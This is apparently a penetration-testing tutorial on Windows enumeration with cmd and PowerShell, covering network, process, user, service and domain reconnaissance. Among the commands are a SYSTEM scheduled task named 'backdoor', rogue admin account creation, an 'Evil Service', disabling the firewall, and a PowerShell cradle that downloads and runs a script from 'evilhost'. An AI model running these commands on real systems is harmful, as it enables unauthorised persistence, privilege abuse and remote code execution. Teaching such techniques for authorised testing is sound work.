Environment Enumeration via Pshell & Cmd

During pentest processes gathering information about systems are very essential. Here is the few commands that i personally use frequently due to gathering information about Microsoft Architectures;

Notice That: You can get more information about commands that we will use in this article by typing help commandname or commandname \?

Information Gathering About Local System

For detecting Network adapters, IP adresses, DNS server:

C:\Users\Hyaloid>ipconfig /all

        --code snippet--
   IPv4 Address. . . . . . . . . . . : 10.0.0.43
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.10.100
   DNS Servers . . . . . . . . . . . : 10.0.0.1
        --code snippet--

Gathering information about open ports(detecting services which only runs in local):

C:\Users\Hyaloid>netstat -anot

 Proto  Local Address          Foreign Address        State           PID      Offload State

  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       536      InHost
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4        InHost
  TCP    0.0.0.0:902            0.0.0.0:0              LISTENING       3800     InHost
  TCP    0.0.0.0:912            0.0.0.0:0              LISTENING       3800     InHost
  TCP    0.0.0.0:1536           0.0.0.0:0              LISTENING       680      InHost
  TCP    0.0.0.0:1537           0.0.0.0:0              LISTENING       1272     InHost
  TCP    0.0.0.0:1538           0.0.0.0:0              LISTENING       1784     InHost
  TCP    0.0.0.0:1539           0.0.0.0:0              LISTENING       760      InHost
  TCP    0.0.0.0:1540           0.0.0.0:0              LISTENING       3216     InHost
                --code snippet--

Gathering information about tasks & killing tasks(if you have enough privilege to do);

C:\Users\Hyaloid>tasklist
    --Shows All Tasks running--
    --Code Snippet--

C:\Users\Hyaloid>tasklist /FI "PID eq 4372" --Finding procces which PID is equal to 4372--

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
TeamViewer_Service.exe        4372 Services                   0     17.568 K

C:\WINDOWS\system32>tasklist /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running" --Finding procces which runs as NT Authority--
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
csrss.exe                      688 Console                    1     13.456 K
NVDisplay.Container.exe       1876 Console                    1     23.504 K

C:\WINDOWS\system32>taskkill /F /FI "PID eq 4372" --Killing procces which PID is equal to 4372--
SUCCESS: The process with PID 4372 has been terminated.

Gathering information about system (OS Name, Version, Type, Installed Hotfixes etc.):

C:\Users\Hyaloid>systeminfo

    --code snippet--
OS Name:                   Microsoft Windows 10 Education
OS Version:                10.0.15063 N/A Build 15063
    --code snippet--
System Type:               x64-based PC
    --code snippet--
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB4022405
                           [02]: KB4025376
                           [03]: KB4038806
                           [04]: KB4040724
    --code snippet--

Gathering scheduled tasks & creating scheduled tasks (you must be administrator):

C:\WINDOWS\system32>schtasks

        --code snippet--
Folder: \
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Adobe Acrobat Update Task                10.07.2018 01:00:00    Ready
Adobe Flash Player NPAPI Notifier        14.07.2018 03:01:00    Ready
        --code snippet--
Folder: \Microsoft\Windows\ApplicationData
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
appuriverifierdaily                      10.07.2018 03:00:00    Ready
appuriverifierinstall                    14.07.2018 03:00:00    Ready
CleanupTemporaryState                    N/A                    Ready
DsSvcCleanup                             N/A                    Ready
        --code snippet--

C:\WINDOWS\system32>schtasks /create /ru SYSTEM /sc MINUTE /MO 5 /tn backdoor /tr "\"C:\\Users\\Hyaloid\\backdoor.exe\""

Finding, adding, deleting users and groups & gathering information about spesific user and group:

C:\WINDOWS\system32>net users
    --code snippet--
-------------------------------------------------------------------------------
Administrator            Guest                    Hyaloid
DefaultUser

C:\WINDOWS\system32>net localgroup
    --code snippet--
*__vmware__
*Administrators
*Backup Operators
*Cryptographic Operators
*Distributed COM Users
    --code snippet--

C:\WINDOWS\system32>net users pentest Password1 /add
Command completed successfully.


C:\WINDOWS\system32>net localgroup "Administrators" pentest /add
Command completed successfully.

C:\WINDOWS\system32>net users pentest /del
Command completed successfully.

C:\WINDOWS\system32>net users pentest Password1 /add /DOMAIN (for adding user to domain)
Command completed sucessfully.

C:\WINDOWS\system32>net group "Domain Admins" pentest /DOMAIN /add (Only could be used by Domain Admin)
Command completed succesfully

C:\WINDOWS\system32>net users hyaloid
        --code snippet--

Local Group Memberships                   *Administrators
                                          *Performance Log Users
Global Group memberships                  *None
        --code snippet--

Information gathering about services:

C:\>sc query
    --code snippet--
SERVICE_NAME: SQLWriter
DISPLAY_NAME: SQL Server VSS Writer
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: SSDPSRV
DISPLAY_NAME: SSDP Bulma
        TYPE               : 30  WIN32
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        --code snippet--

C:\>sc query state= inactive //stopped services
    --code snippet--

Starting, stopping, deleting and editing services:

C:\>sc create "Evil Service" binPath= "C:\Hyaloid\evil.exe" start= auto
C:\>sc start "Evil Service" //start
C:\>sc stop "Evil Service" //stop
C:\>sc config "Evil Service" binPath= "C:\Users\Hacker\Desktop\evil.exe" start= manuel //edit
C:\>sc delete "Evil Service" //delete

Checking file permissions:

C:\>icacls "C:\Users\Hyaloid\AppData\Local\Temp"
C:\Users\Hyaloid\AppData\Local\Temp Everyone:(OI)(CI)(F)
                                    NT AUTHORITY\SYSTEM:(OI)(CI)(F)

Playing with firewall configutions:

PS C:\WINDOWS\system32> netsh advfirewall show currentprofile

Private Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (GPO-store only)
LocalConSecRules                      N/A (GPO-store only)
InboundUserNotification               Enable
        --code snippet--

PS C:\WINDOWS\system32> netsh advfirewall set currentprofile state off  //You can change profile to domainprofile.
Ok. 

Downloading files to target system via powershell:

C:\>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.103/evil.exe','C:\Users\Hyaloid\Downloads\evil.exe')

Downloading and executing .ps1 files via powershell (you can use this to execute malicious powershell files on target):

powershell.exe “IEX (New-Object  Net.WebClient).DownloadString(‘http://evilhost/Malicious.ps1’)"

Microsoft Domain Structer Enumeration

In order to gather information about Domain structers, i personally use an excellent and simple tool called windapsearch. Its uses LDAP queries to extract information about users, groups and computers.

Here is an example taken from its README file;

root@kali:~/windapsearch# ./windapsearch.py -d lab.ropnop.com -u ropnop\\ldapbind -p GoCubs16 --da
[+] No DC IP provided. Will try to discover via DNS lookup.
[+] Using Domain Controller at: 172.16.13.10
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=lab,DC=ropnop,DC=com
[+] Attempting bind
[+]     ...success! Binded as:
[+]      u:ROPNOP\ldapbind
[+] Attempting to enumerate all Domain Admins
[+] Using DN: CN=Domain Admins,CN=Users.CN=Domain Admins,CN=Users,DC=lab,DC=ropnop,DC=com
[+]     Found 12 Domain Admins:

cn: Administrator

cn: Andy Green
userPrincipalName: agreen@lab.ropnop.com

cn: Natasha Strong
userPrincipalName: nstrong@lab.ropnop.com

cn: Linda Alton
userPrincipalName: lalton@lab.ropnop.com

And also a few metasploit modules that you can use to gather information about domain;

post/windows/gather/enum_domain
post/windows/gather/enum_domain_group_users
post/windows/gather/enum_domain_users
post/windows/gather/enum_domains
post/windows/gather/enum_ad_computers

Of course this techniques are not all of techniques that pentesters may use in order to gather information but at least i can say that im using these techniques for sure.